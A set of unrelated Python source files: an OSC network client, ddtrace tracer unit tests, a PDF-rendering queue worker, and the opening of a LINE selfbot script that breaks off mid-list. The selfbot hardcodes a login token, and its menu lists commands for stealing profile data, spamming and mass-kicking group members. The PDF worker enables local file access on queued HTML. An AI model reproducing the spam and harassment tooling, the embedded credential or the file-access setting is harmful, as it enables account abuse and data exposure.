slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receiveWithTimeout(slen)
if not chunk:
return None
# decode OSC content
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("CLIENT: Message decoding failed.")
return msg
def _receiving_thread_entry(self):
print "CLIENT: Entered receiving thread."
self._running = True
while self._running:
decoded = self._receiveMsgWithTimeout()
if not decoded:
break
elif len(decoded) <= 0:
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
continue
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
if not txOk:
break
print "CLIENT: Receiving thread terminated."
def _unbundle(self, decoded):
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.socket.getpeername())
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def connect(self, address):
self.socket.connect(address)
self.receiving_thread = threading.Thread(target=self._receiving_thread_entry)
self.receiving_thread.start()
def close(self):
# let socket time out
self._running = False
self.receiving_thread.join()
self.socket.close()
def _transmitWithTimeout(self, data):
sent = 0
while sent < len(data):
try:
tmp = self.socket.send(data[sent:])
except socket.timeout:
if not self._running:
print "CLIENT: Socket timed out and termination requested."
return False
else:
continue
except socket.error, e:
if e[0] == errno.ECONNRESET:
print "CLIENT: Connection reset by peer."
return False
else:
raise e
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsgWithTimeout(self, msg):
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
binary = msg.getBinary()
length = len(binary)
# prepend length of packet before the actual message (big endian)
len_big_endian = array.array('c', '\0' * 4)
struct.pack_into(">L", len_big_endian, 0, length)
len_big_endian = len_big_endian.tostring()
if self._transmitWithTimeout(len_big_endian) and self._transmitWithTimeout(binary):
return True
else:
return False
def sendOSC(self, msg):
"""Send an OSC message or bundle to the server. Returns True on success.
"""
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
return txOk
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.socket.getpeername()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
isequal = cmp(self.socket._sock, other.socket._sock)
if isequal and self.server and other.server:
return cmp(self.server, other.server)
return isequal
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
# vim:noexpandtab
|
test_tracer.py
|
import time
import opentracing
from opentracing import (
child_of,
Format,
InvalidCarrierException,
UnsupportedFormatException,
SpanContextCorruptedException,
)
import ddtrace
from ddtrace.ext.priority import AUTO_KEEP
from ddtrace.opentracer import Tracer, set_global_tracer
from ddtrace.opentracer.span_context import SpanContext
from ddtrace.propagation.http import HTTP_HEADER_TRACE_ID
from ddtrace.settings import ConfigException
import mock
import pytest
class TestTracerConfig(object):
def test_config(self):
"""Test the configuration of the tracer"""
config = {'enabled': True}
tracer = Tracer(service_name='myservice', config=config)
assert tracer._service_name == 'myservice'
assert tracer._enabled is True
def test_no_service_name(self):
"""A service_name should be generated if one is not provided."""
tracer = Tracer()
assert tracer._service_name == 'pytest'
def test_multiple_tracer_configs(self):
"""Ensure that a tracer config is a copy of the passed config."""
config = {'enabled': True}
tracer1 = Tracer(service_name='serv1', config=config)
assert tracer1._service_name == 'serv1'
config['enabled'] = False
tracer2 = Tracer(service_name='serv2', config=config)
# Ensure tracer1's config was not mutated
assert tracer1._service_name == 'serv1'
assert tracer1._enabled is True
assert tracer2._service_name == 'serv2'
assert tracer2._enabled is False
def test_invalid_config_key(self):
"""A config with an invalid key should raise a ConfigException."""
config = {'enabeld': False}
# No debug flag should not raise an error
tracer = Tracer(service_name='mysvc', config=config)
# With debug flag should raise an error
config['debug'] = True
with pytest.raises(ConfigException) as ce_info:
tracer = Tracer(config=config)
assert 'enabeld' in str(ce_info)
assert tracer is not None
# Test with multiple incorrect keys
config['setttings'] = {}
with pytest.raises(ConfigException) as ce_info:
tracer = Tracer(service_name='mysvc', config=config)
assert ['enabeld', 'setttings'] in str(ce_info)
assert tracer is not None
def test_global_tags(self):
"""Global tags should be passed from the opentracer to the tracer."""
config = {
'global_tags': {
'tag1': 'value1',
'tag2': 2,
},
}
tracer = Tracer(service_name='mysvc', config=config)
with tracer.start_span('myop') as span:
# global tags should be attached to generated all datadog spans
assert span._dd_span.get_tag('tag1') == 'value1'
assert span._dd_span.get_tag('tag2') == '2'
with tracer.start_span('myop2') as span2:
assert span2._dd_span.get_tag('tag1') == 'value1'
assert span2._dd_span.get_tag('tag2') == '2'
class TestTracer(object):
def test_start_span(self, ot_tracer, writer):
"""Start and finish a span."""
with ot_tracer.start_span('myop') as span:
pass
# span should be finished when the context manager exits
assert span.finished
spans = writer.pop()
assert len(spans) == 1
def test_start_span_references(self, ot_tracer, writer):
"""Start a span using references."""
with ot_tracer.start_span('one', references=[child_of()]):
pass
spans = writer.pop()
assert spans[0].parent_id is None
root = ot_tracer.start_active_span('root')
# create a child using a parent reference that is not the context parent
with ot_tracer.start_active_span('one'):
with ot_tracer.start_active_span('two', references=[child_of(root.span)]):
pass
root.close()
spans = writer.pop()
assert spans[2].parent_id is spans[0].span_id
def test_start_span_custom_start_time(self, ot_tracer):
"""Start a span with a custom start time."""
t = 100
with mock.patch('ddtrace.span.time_ns') as time:
time.return_value = 102 * 1e9
with ot_tracer.start_span('myop', start_time=t) as span:
pass
assert span._dd_span.start == t
assert span._dd_span.duration == 2
def test_start_span_with_spancontext(self, ot_tracer, writer):
"""Start and finish a span using a span context as the child_of
reference.
"""
with ot_tracer.start_span('myop') as span:
with ot_tracer.start_span('myop', child_of=span.context) as span2:
pass
# span should be finished when the context manager exits
assert span.finished
assert span2.finished
spans = writer.pop()
assert len(spans) == 2
# ensure proper parenting
assert spans[1].parent_id is spans[0].span_id
def test_start_span_with_tags(self, ot_tracer):
"""Create a span with initial tags."""
tags = {'key': 'value', 'key2': 'value2'}
with ot_tracer.start_span('myop', tags=tags) as span:
pass
assert span._dd_span.get_tag('key') == 'value'
assert span._dd_span.get_tag('key2') == 'value2'
def test_start_span_with_resource_name_tag(self, ot_tracer):
"""Create a span with the tag to set the resource name"""
tags = {'resource.name': 'value', 'key2': 'value2'}
with ot_tracer.start_span('myop', tags=tags) as span:
pass
# Span resource name should be set to tag value, and should not get set as
# a tag on the underlying span.
assert span._dd_span.resource == 'value'
assert span._dd_span.get_tag('resource.name') is None
# Other tags are set as normal
assert span._dd_span.get_tag('key2') == 'value2'
def test_start_active_span_multi_child(self, ot_tracer, writer):
"""Start and finish multiple child spans.
This should ensure that child spans can be created 2 levels deep.
"""
with ot_tracer.start_active_span('myfirstop') as scope1:
time.sleep(0.009)
with ot_tracer.start_active_span('mysecondop') as scope2:
time.sleep(0.007)
with ot_tracer.start_active_span('mythirdop') as scope3:
time.sleep(0.005)
# spans should be finished when the context manager exits
assert scope1.span.finished
assert scope2.span.finished
assert scope3.span.finished
spans = writer.pop()
# check spans are captured in the trace
assert scope1.span._dd_span is spans[0]
assert scope2.span._dd_span is spans[1]
assert scope3.span._dd_span is spans[2]
# ensure proper parenting
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[1].span_id
# sanity check a lower bound on the durations
assert spans[0].duration >= 0.009 + 0.007 + 0.005
assert spans[1].duration >= 0.007 + 0.005
assert spans[2].duration >= 0.005
def test_start_active_span_multi_child_siblings(self, ot_tracer, writer):
"""Start and finish multiple span at the same level.
This should test to ensure a parent can have multiple child spans at the
same level.
"""
with ot_tracer.start_active_span('myfirstop') as scope1:
time.sleep(0.009)
with ot_tracer.start_active_span('mysecondop') as scope2:
time.sleep(0.007)
with ot_tracer.start_active_span('mythirdop') as scope3:
time.sleep(0.005)
# spans should be finished when the context manager exits
assert scope1.span.finished
assert scope2.span.finished
assert scope3.span.finished
spans = writer.pop()
# check spans are captured in the trace
assert scope1.span._dd_span is spans[0]
assert scope2.span._dd_span is spans[1]
assert scope3.span._dd_span is spans[2]
# ensure proper parenting
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[0].span_id
# sanity check a lower bound on the durations
assert spans[0].duration >= 0.009 + 0.007 + 0.005
assert spans[1].duration >= 0.007
assert spans[2].duration >= 0.005
def test_start_span_manual_child_of(self, ot_tracer, writer):
"""Start spans without using a scope manager.
Spans should be created without parents since there will be no call
for the active span.
"""
root = ot_tracer.start_span('zero')
with ot_tracer.start_span('one', child_of=root):
with ot_tracer.start_span('two', child_of=root):
with ot_tracer.start_span('three', child_of=root):
pass
root.finish()
spans = writer.pop()
assert spans[0].parent_id is None
# ensure each child span is a child of root
assert spans[1].parent_id is root._dd_span.span_id
assert spans[2].parent_id is root._dd_span.span_id
assert spans[3].parent_id is root._dd_span.span_id
assert (
spans[0].trace_id == spans[1].trace_id
and spans[1].trace_id == spans[2].trace_id
)
def test_start_span_no_active_span(self, ot_tracer, writer):
"""Start spans without using a scope manager.
Spans should be created without parents since there will be no call
for the active span.
"""
with ot_tracer.start_span('one', ignore_active_span=True):
with ot_tracer.start_span('two', ignore_active_span=True):
pass
with ot_tracer.start_span('three', ignore_active_span=True):
pass
spans = writer.pop()
# ensure each span does not have a parent
assert spans[0].parent_id is None
assert spans[1].parent_id is None
assert spans[2].parent_id is None
# and that each span is a new trace
assert (
spans[0].trace_id != spans[1].trace_id
and spans[1].trace_id != spans[2].trace_id
and spans[0].trace_id != spans[2].trace_id
)
def test_start_active_span_child_finish_after_parent(self, ot_tracer, writer):
"""Start a child span and finish it after its parent."""
span1 = ot_tracer.start_active_span('one').span
span2 = ot_tracer.start_active_span('two').span
span1.finish()
time.sleep(0.005)
span2.finish()
spans = writer.pop()
assert len(spans) == 2
assert spans[0].parent_id is None
assert spans[1].parent_id is span1._dd_span.span_id
assert spans[1].duration > spans[0].duration
def test_start_span_multi_intertwined(self, ot_tracer, writer):
"""Start multiple spans at the top level intertwined.
Alternate calling between two traces.
"""
import threading
# synchronize threads with a threading event object
event = threading.Event()
def trace_one():
id = 11
with ot_tracer.start_active_span(str(id)):
id += 1
with ot_tracer.start_active_span(str(id)):
id += 1
with ot_tracer.start_active_span(str(id)):
event.set()
def trace_two():
id = 21
event.wait()
with ot_tracer.start_active_span(str(id)):
id += 1
with ot_tracer.start_active_span(str(id)):
id += 1
with ot_tracer.start_active_span(str(id)):
pass
# the ordering should be
# t1.span1/t2.span1, t2.span2, t1.span2, t1.span3, t2.span3
t1 = threading.Thread(target=trace_one)
t2 = threading.Thread(target=trace_two)
t1.start()
t2.start()
# wait for threads to finish
t1.join()
t2.join()
spans = writer.pop()
# trace_one will finish before trace_two so its spans should be written
# before the spans from trace_two, let's confirm this
assert spans[0].name == '11'
assert spans[1].name == '12'
assert spans[2].name == '13'
assert spans[3].name == '21'
assert spans[4].name == '22'
assert spans[5].name == '23'
# next let's ensure that each span has the correct parent:
# trace_one
assert spans[0].parent_id is None
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[1].span_id
# trace_two
assert spans[3].parent_id is None
assert spans[4].parent_id is spans[3].span_id
assert spans[5].parent_id is spans[3].span_id
# finally we should ensure that the trace_ids are reasonable
# trace_one
assert (
spans[0].trace_id == spans[1].trace_id
and spans[1].trace_id == spans[2].trace_id
)
# traces should be independent
assert spans[2].trace_id != spans[3].trace_id
# trace_two
assert (
spans[3].trace_id == spans[4].trace_id
and spans[4].trace_id == spans[5].trace_id
)
def test_start_active_span(self, ot_tracer, writer):
with ot_tracer.start_active_span('one') as scope:
pass
assert scope.span._dd_span.name == 'one'
assert scope.span.finished
spans = writer.pop()
assert spans
def test_start_active_span_finish_on_close(self, ot_tracer, writer):
with ot_tracer.start_active_span('one', finish_on_close=False) as scope:
pass
assert scope.span._dd_span.name == 'one'
assert not scope.span.finished
spans = writer.pop()
assert not spans
def test_start_active_span_nested(self, ot_tracer):
"""Test the active span of multiple nested calls of start_active_span."""
with ot_tracer.start_active_span('one') as outer_scope:
assert ot_tracer.active_span == outer_scope.span
with ot_tracer.start_active_span('two') as inner_scope:
assert ot_tracer.active_span == inner_scope.span
with ot_tracer.start_active_span(
'three'
) as innest_scope: # why isn't it innest? innermost so verbose
assert ot_tracer.active_span == innest_scope.span
with ot_tracer.start_active_span('two') as inner_scope:
assert ot_tracer.active_span == inner_scope.span
assert ot_tracer.active_span == outer_scope.span
assert ot_tracer.active_span is None
def test_start_active_span_trace(self, ot_tracer, writer):
"""Test the active span of multiple nested calls of start_active_span."""
with ot_tracer.start_active_span('one') as outer_scope:
outer_scope.span.set_tag('outer', 2)
with ot_tracer.start_active_span('two') as inner_scope:
inner_scope.span.set_tag('inner', 3)
with ot_tracer.start_active_span('two') as inner_scope:
inner_scope.span.set_tag('inner', 3)
with ot_tracer.start_active_span('three') as innest_scope:
innest_scope.span.set_tag('innerest', 4)
spans = writer.pop()
assert spans[0].parent_id is None
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[0].span_id
assert spans[3].parent_id is spans[2].span_id
@pytest.fixture
def nop_span_ctx():
return SpanContext(sampling_priority=AUTO_KEEP)
class TestTracerSpanContextPropagation(object):
"""Test the injection and extration of a span context from a tracer."""
def test_invalid_format(self, ot_tracer, nop_span_ctx):
"""An invalid format should raise an UnsupportedFormatException."""
# test inject
with pytest.raises(UnsupportedFormatException):
ot_tracer.inject(nop_span_ctx, None, {})
# test extract
with pytest.raises(UnsupportedFormatException):
ot_tracer.extract(None, {})
def test_inject_invalid_carrier(self, ot_tracer, nop_span_ctx):
"""Only dicts should be supported as a carrier."""
with pytest.raises(InvalidCarrierException):
ot_tracer.inject(nop_span_ctx, Format.HTTP_HEADERS, None)
def test_extract_invalid_carrier(self, ot_tracer):
"""Only dicts should be supported as a carrier."""
with pytest.raises(InvalidCarrierException):
ot_tracer.extract(Format.HTTP_HEADERS, None)
def test_http_headers_base(self, ot_tracer):
"""extract should undo inject for http headers."""
span_ctx = SpanContext(trace_id=123, span_id=456)
carrier = {}
ot_tracer.inject(span_ctx, Format.HTTP_HEADERS, carrier)
assert len(carrier.keys()) > 0
ext_span_ctx = ot_tracer.extract(Format.HTTP_HEADERS, carrier)
assert ext_span_ctx._dd_context.trace_id == 123
assert ext_span_ctx._dd_context.span_id == 456
def test_http_headers_baggage(self, ot_tracer):
"""extract should undo inject for http headers."""
span_ctx = SpanContext(
trace_id=123, span_id=456, baggage={'test': 4, 'test2': 'string'}
)
carrier = {}
ot_tracer.inject(span_ctx, Format.HTTP_HEADERS, carrier)
assert len(carrier.keys()) > 0
ext_span_ctx = ot_tracer.extract(Format.HTTP_HEADERS, carrier)
assert ext_span_ctx._dd_context.trace_id == 123
assert ext_span_ctx._dd_context.span_id == 456
assert ext_span_ctx.baggage == span_ctx.baggage
def test_empty_propagated_context(self, ot_tracer):
"""An empty propagated context should raise a
SpanContextCorruptedException when extracted.
"""
carrier = {}
with pytest.raises(SpanContextCorruptedException):
ot_tracer.extract(Format.HTTP_HEADERS, carrier)
def test_text(self, ot_tracer):
"""extract should undo inject for http headers"""
span_ctx = SpanContext(
trace_id=123, span_id=456, baggage={'test': 4, 'test2': 'string'}
)
carrier = {}
ot_tracer.inject(span_ctx, Format.TEXT_MAP, carrier)
assert len(carrier.keys()) > 0
ext_span_ctx = ot_tracer.extract(Format.TEXT_MAP, carrier)
assert ext_span_ctx._dd_context.trace_id == 123
assert ext_span_ctx._dd_context.span_id == 456
assert ext_span_ctx.baggage == span_ctx.baggage
def test_corrupted_propagated_context(self, ot_tracer):
"""Corrupted context should raise a SpanContextCorruptedException."""
span_ctx = SpanContext(
trace_id=123, span_id=456, baggage={'test': 4, 'test2': 'string'}
)
carrier = {}
ot_tracer.inject(span_ctx, Format.TEXT_MAP, carrier)
assert len(carrier.keys()) > 0
# manually alter a key in the carrier baggage
del carrier[HTTP_HEADER_TRACE_ID]
corrupted_key = HTTP_HEADER_TRACE_ID[2:]
carrier[corrupted_key] = 123
with pytest.raises(SpanContextCorruptedException):
ot_tracer.extract(Format.TEXT_MAP, carrier)
def test_immutable_span_context(self, ot_tracer):
"""Span contexts should be immutable."""
with ot_tracer.start_span('root') as root:
ctx_before = root.context
root.set_baggage_item('test', 2)
assert ctx_before is not root.context
with ot_tracer.start_span('child') as level1:
with ot_tracer.start_span('child') as level2:
pass
assert root.context is not level1.context
assert level2.context is not level1.context
assert level2.context is not root.context
def test_inherited_baggage(self, ot_tracer):
"""Baggage should be inherited by child spans."""
with ot_tracer.start_active_span('root') as root:
# this should be passed down to the child
root.span.set_baggage_item('root', 1)
root.span.set_baggage_item('root2', 1)
with ot_tracer.start_active_span('child') as level1:
level1.span.set_baggage_item('level1', 1)
with ot_tracer.start_active_span('child') as level2:
level2.span.set_baggage_item('level2', 1)
# ensure immutability
assert level1.span.context is not root.span.context
assert level2.span.context is not level1.span.context
# level1 should have inherited the baggage of root
assert level1.span.get_baggage_item('root')
assert level1.span.get_baggage_item('root2')
# level2 should have inherited the baggage of both level1 and level2
assert level2.span.get_baggage_item('root')
assert level2.span.get_baggage_item('root2')
assert level2.span.get_baggage_item('level1')
assert level2.span.get_baggage_item('level2')
class TestTracerCompatibility(object):
"""Ensure that our opentracer produces results in the underlying datadog tracer."""
def test_required_dd_fields(self):
"""Ensure required fields needed for successful tracing are possessed
by the underlying datadog tracer.
"""
# a service name is required
tracer = Tracer('service')
with tracer.start_span('my_span') as span:
assert span._dd_span.service
def test_set_global_tracer():
"""Sanity check for set_global_tracer"""
my_tracer = Tracer('service')
set_global_tracer(my_tracer)
assert opentracing.tracer is my_tracer
assert ddtrace.tracer is my_tracer._dd_tracer
|
backend.py
|
#!/usr/bin/env python3
import pika
import sys, os
import time
import threading
import logging
import redis
import queue
import pdfkit
import time
time.sleep(20)
xrange=range
if sys.argv[1:]:
max_threads = int(sys.argv[1])
else:
max_threads = int(os.environ.get('MAX_THREADS'))
logfile = os.environ.get('LOGFILE')
rabbit_host = os.environ.get('RABBIT_HOST')
rabbit_queue = os.environ.get('RABBIT_QUEUE')
rabbit_user = os.environ.get('RABBIT_USER')
rabbit_password = os.environ.get('RABBIT_PASS')
redis_host = os.environ.get('REDIS_HOST')
redis_port = os.environ.get('REDIS_PORT')
redis_db = os.environ.get('REDIS_DB')
logging.basicConfig(level=logging.DEBUG,format='%(asctime)-15s - %(threadName)-10s - %(message)s',filename=logfile)
pdfkitoptions = {
'enable-local-file-access': None,
'javascript-delay': 200,
'wait-for-network-idle': None
}
time.sleep(15)
def render_pdf(msg_id):
output_file = '/tmp/' + msg_id + '.pdf'
input_file = '/tmp/' + msg_id + '.html'
logging.debug('loading html from redis')
redis_server = redis.Redis(redis_host, port=redis_port, db=redis_db)
redis_response = redis_server.get(msg_id)
logging.debug('html loaded')
m = open(input_file, "wb")
m.write(redis_response)
m.close()
logging.debug('html writed')
start_time = time.time()
sys_output = pdfkit.from_file(input_file, output_file, options=pdfkitoptions)
finish_time = time.time()
input_size = str(os.path.getsize(input_file)/1024) #.decode('utf-8')
output_size = str(os.path.getsize(output_file)/1024) #.decode('utf-8')
dbg_mesg = '[R] Render [msg.id:' + msg_id + '] ' + '[rend.time:' + str(finish_time-start_time) + 'sec]' + '[in.fle:' + input_file + '(' + input_size + 'kb)]' + '[ou.fle:' + output_file + '(' + output_size + 'kb)]'
logging.debug(dbg_mesg)
n = open(output_file, "rb")
binary_data = n.read()
n.close()
logging.debug('pdf loaded')
msg_out = msg_id.split('_')
msg = 'R_' + msg_out[1]
redis_server.set(msg, binary_data)
logging.debug('pdf writed')
redis_server.delete(msg_id)
logging.debug('db record removed: ' + msg_id)
os.remove(output_file)
logging.debug('tmp file removed: ' + input_file)
os.remove(input_file)
logging.debug('tmp file removed: ' + output_file)
logging.debug('render done')
if not sys_output:
return True, output_file
return False, sys_output
#logging.debug('backend node starting...')
print('backend node starting...')
TQ = queue.Queue()
#logging.debug('threads pool starting...')
print('threads pool starting...')
def catcher(q):
while True:
try:
print ("trying...")
print (q)
item = q.get()
print ("wut...")
except Empty:
break
#logging.debug('render get task: ' + item.strip().decode('utf-8'))
print('render get task: ' + item.strip().decode('utf-8'))
render_pdf(item.strip().decode('utf-8'))
q.task_done()
for i in xrange(max_threads):
wrkr_T = threading.Thread(target = catcher, args=(TQ,))
print('thread created...')
wrkr_T.daemon = True
wrkr_T.start()
logging.debug('thread: ' + str(i) + ' started')
logging.debug('consumer started...')
credentials = pika.PlainCredentials(rabbit_user, rabbit_password)
try:
rabbit_server = pika.BlockingConnection(pika.ConnectionParameters(host=rabbit_host,credentials=credentials))
channel = rabbit_server.channel()
channel.queue_declare(queue=rabbit_queue)
def callback(ch, method, properties, body):
TQ.put(body)
logging.debug('consumer got task: ' + body.strip().decode('utf-8'))
channel.basic_consume(rabbit_queue, callback, auto_ack = True)
channel.start_consuming()
except KeyboardInterrupt:
logging.debug('backen daemon stopt')
print ("backend node stopt")
|
azmi.py
|
# -*- coding: utf-8 -*-
#baru
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
from PyDictionary import PyDictionary
from bs4 import BeautifulSoup
from mergedict import MergeDict
from mergedict import ConfigDict
from gtts import gTTS
from pyowm import OWM
from enum import Enum
#from django.http import HttpResponse
from flask import Flask, send_from_directory, redirect as redirect_flask, render_template
from random import randint
import time, random, sys, re, os, json
import subprocess, threading, string,codecs, requests, tweepy, ctypes, urllib, urllib2, wikipedia,cookielib,urllib3
import urllib3
import certifi
import ssl
import html5lib,shutil
import subprocess as cmd
import csv
import os
import errno
import imp
import StringIO
import traceback
import linecache
import stat
import cStringIO
import urlparse
import logging
import argparse
#import mimic
import xml
import base64
import ast
cl = LINETCR.LINE()
cl.login(token="EpZmr1vHTETBgTktOSFd.rLylacrPH39WJb0UIwB8Nq.iF+C5K0kG+xhIuIcc90vb1ER+7aCRdeMt1j/ocjPQSU=")
cl.loginResult()
print "Amii"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage= """\n
▂▃▅▇█▓▒░۩H̸͟͞e̸͟͞l̸͟͞p̸͟͞ ̸͟͞۩░▒▓█▇▅▃▂
═╬════════►∆∆
E̸͟͞d̸͟͞i̸͟͞t̸͟͞e̸͟͞d̸͟͞.
═╬════════►
🔘 My name : |╬|
🔘 Bot2 rename: |╬|
🔘 Bot3 rename: |╬|
🔘 Bot4 rename: |╬|
🔘 Bot5 rename: |╬|
🔘 Bot6 rename: |╬|
🔘 All rename: |╬|
🔘 Allbio: |╬|
🔘 My clone @ |╬|
🔘 Bot2 clone @ |╬|
🔘 Bot3 clone @ |╬|
🔘 Bot4 clone @ |╬|
🔘 Bot5 clone @ |╬|
🔘 Bot6 clone @ |╬|
🔘 Comment: |╬|
🔘 Message: |╬|
🔘 Bot1-6 backup |╬|
🔘 Bot1-6 backup |╬|
🔘 Group name: |╬|
═╬════════►∆∆
🔓D̸͟͞e̸͟͞m̸͟͞o̸͟͞t̸͟͞e̸͟͞d̸͟͞.🔓
═╬════════►
|╬| Admin on @
|╬| Expel on @
|╬| Expelal
═╬════════►
📷S̸͟͞T̸͟͞E̸͟͞A̸͟͞L̸͟͞I̸͟͞N̸͟͞G̸͟͞📷
═╬════════►
|╬| Steal
|╬| Steal name @
|╬| Steal Bio @
|╬| Steal status @
|╬| Steal mid @
|╬| Steal contact @
|╬| Steal cover @
|╬| Steal pict @
|╬| Steal group pict
|╬| Midpict: [mid]
|╬| Pict group [name]
|╬| My pict
|╬| My cover
|╬| My name
|╬| My bio
|╬| Pap set:
|╬| Pap
|╬| Image [Text]
═╬════════►
🔐S̸͟͞E̸͟͞C̸͟͞U̸͟͞R̸͟͞Y̸͟͞I̸͟͞T̸͟͞Y̸͟͞🔐
═╬════════►
|╬| Protect:low
|╬| Protect:hight
═╬════════►
🚮L̸͟͞I̸͟͞S̸͟͞T̸͟͞ B̸͟͞A̸͟͞N̸͟͞N̸͟͞E̸͟͞D̸͟͞🚮
═╬════════►
|╬| Ban @
|╬| Unban @
|╬| Banned
|╬| Unbanned
|╬| Ban repeat @
|╬| Add friend @
|╬| Clear banlist
═╬════════►
📲i̲̅n̲̅v̲̅i̲̅t̲̅a̲̅t̲̅i̲̅o̲̅n̲̅📲
═╬════════►
|╬| Invite:[mid]
|╬| Invite user[contact]
|╬| Invite me
|╬| Team @join
═╬════════►
📴L̸͟͞E̸͟͞A̸͟͞V̸͟͞E̸͟͞ G̸͟͞R̸͟͞O̸͟͞U̸͟͞P̸͟͞📴
═╬════════►
|╬| Bot2 @bye
|╬| Bot3 @bye
|╬| Bot4 @bye
|╬| Bot5 @bye
|╬| Bot6 @bye
|╬| Team @bye
|╬| Center @bye
|╬| Bye allgroups[own]
═╬════════►
🔫A̸͟͞U̸͟͞T̸͟͞O̸͟͞ S̸͟͞E̸͟͞T̸͟͞ B̸͟͞O̸͟͞T̸͟͞🔫
═╬════════►
|╬| Auto reinvite:on/off
|╬| Auto join:on/off
|╬| Auto leave:on/off
|╬| Auto like:on/off
|╬| Like friend:on/off
|╬| Welcome message:on/off
|╬| Auto notice:on/off
|╬| Denyinvites on/off
|╬| Blockqr:on/off
|╬| Namelock:on/off
|╬| Auto add:on/off
|╬| Check message
|╬| Add message:
|╬| Comment:on/off
|╬| Add comment:
|╬| Check comment
|╬| Backup:on/off
|╬| Gcancel:
|╬| Update welcome:
|╬| Check welcome message
═╬════════►
🚮M̸͟͞O̸͟͞D̸͟͞E̸͟͞ C̸͟͞A̸͟͞N̸͟͞C̸͟͞E̸͟͞L̸͟͞🚮
═╬════════►
|╬| Rejectall
|╬| Clean invites
|╬| Clear invites
═╬════════►
S̸͟͞U̸͟͞R̸͟͞P̸͟͞R̸͟͞I̸͟͞S̸͟͞E̸͟͞ G̸͟͞I̸͟͞F̸͟͞T̸͟͞
═╬════════►
|╬| gift1-15
|╬| Spam gift
|╬| Gift @
═╬════════►
📲N̸͟͞O̸͟͞T̸͟͞I̸͟͞F̸͟͞I̸͟͞C̸͟͞A̸͟͞T̸͟͞I̸͟͞O̸͟͞N̸͟͞ 📲
═╬════════►
|╬| Group list
|╬| Banlist
|╬| Admin list
|╬| Settings
|╬| Ginfo
|╬| TL:[text]
|╬| Miclist
|╬| Micdel @
|╬| Micadd @
═╬════════►
🚮W̸͟͞T̸͟͞F̸͟͞ K̸͟͞I̸͟͞L̸͟͞L̸͟͞ Y̸͟͞O̸͟͞U̸͟͞🚮
═╬════════►
|╬| #Bubar
|╬| Vkick @
|╬| Nk [name]
|╬| Kick:[mid]
|╬| Purge
═╬════════►
💻S̸͟͞P̸͟͞A̸͟͞M͞ S̸͟͞E̸͟͞R̸͟͞V̸͟͞E̸͟͞R̸͟͞💻
═╬════════►
|╬| Spamg[on/off]
|╬| Spam add:
|╬| Spam change:
|╬| Spam start:[number]
|╬| Spam @
|╬| Say a̸͟͞a̸͟͞a̸͟͞
|╬| Me
|╬| Speed
|╬| Debug speed
|╬| My mid
|╬| Gcreator
|╬| Halo
|╬| Bot contact
|╬| Bot mid
|╬| Creator
|╬| System
|╬| Iconfig
|╬| Kernel
|╬| Cpu
|╬| Respon/sname
|╬| Help
|╬| Mc:[mid]
|╬| runtim
|╬| show offenders:on/off
═╬════════►
💻U̸͟͞T̸͟͞I̸͟͞L̸͟͞I̸͟͞T̸͟͞Y̸͟͞💻
═╬════════►
|╬| Lurking
|╬| Lurking result
|╬| Link open
|╬| Link close
|╬| Gurl
|╬| Remove chat
|╬| Bot restart
═╬════════►
💿S̸͟͞E̸͟͞A̸͟͞R̸͟͞C̸͟͞H̸͟͞ C̸͟͞H̸͟͞A̸͟͞T̸͟͞💿
═╬════════►
|╬| Lyric
|╬| Music
|╬| Wiki
|╬| Vidio
|╬| Youtube
|╬| Instagram
|╬| Translate-idn [text]
|╬| Translate-eng [text]
|╬| Translate-thai [text]
|╬| Translate-japan [text]
|╬| Translate-arab [text]
|╬| Translate-korea [text]
|╬| Translate-chin [text]
|╬| Vn-id [text]
|╬| Vn-en [text]
|╬| Vn-jp [text]
|╬| Kalender
|╬| Vn [Text]
|╬| Cek zodiak [Tggl-bulan-tahun]
|╬| Tag on/off
|╬| Emoji [expression]
|╬| Info @[name]
|╬| Ping
|╬| Time
|╬| apakah
|╬| kerang ajaib
|╬| Sticker [expression]
═╬════════►
📣B̸͟͞R̸͟͞O̸͟͞A̸͟͞D̸͟͞C̸͟͞A̸͟͞S̸͟͞T̸͟͞📣
═╬════════►
|╬| Pm cast
|╬| Broadcast
|╬| Spam @[name]
═╬════════►
💻P̸͟͞o̸͟͞w̸͟͞e̸͟͞r̸͟͞💻
═╬════════►
🔘Turn off bots🔘
●▬▬▬▬๑۩Special Thanks۩๑▬▬▬▬▬●
●▬▬▬▬๑۩A̴M̴I̴I̴ T̴E̴A̴M̴B̴O̴T̴۩๑▬▬▬▬▬●
"""
textspeech= """╔═════════════════
║ TEXT TO SPEECH
╠═════════════════
╠➩ 'af' : 'Afrikaans'
╠➩ 'sq' : 'Albanian'
╠➩ 'ar' : 'Arabic'
╠➩ 'hy' : 'Armenian'
╠➩ 'bn' : 'Bengali'
╠➩ 'ca' : 'Catalan'
╠➩ 'zh' : 'Chinese'
╠➩ 'zhcn' : 'Chinese (Mandarin/China)'
╠➩ 'zhtw' : 'Chinese (Mandarin/Taiwan)'
╠➩ 'zhyue' : 'Chinese (Cantonese)'
╠➩ 'hr' : 'Croatian'
╠➩ 'cs' : 'Czech'
╠➩ 'da' : 'Danish'
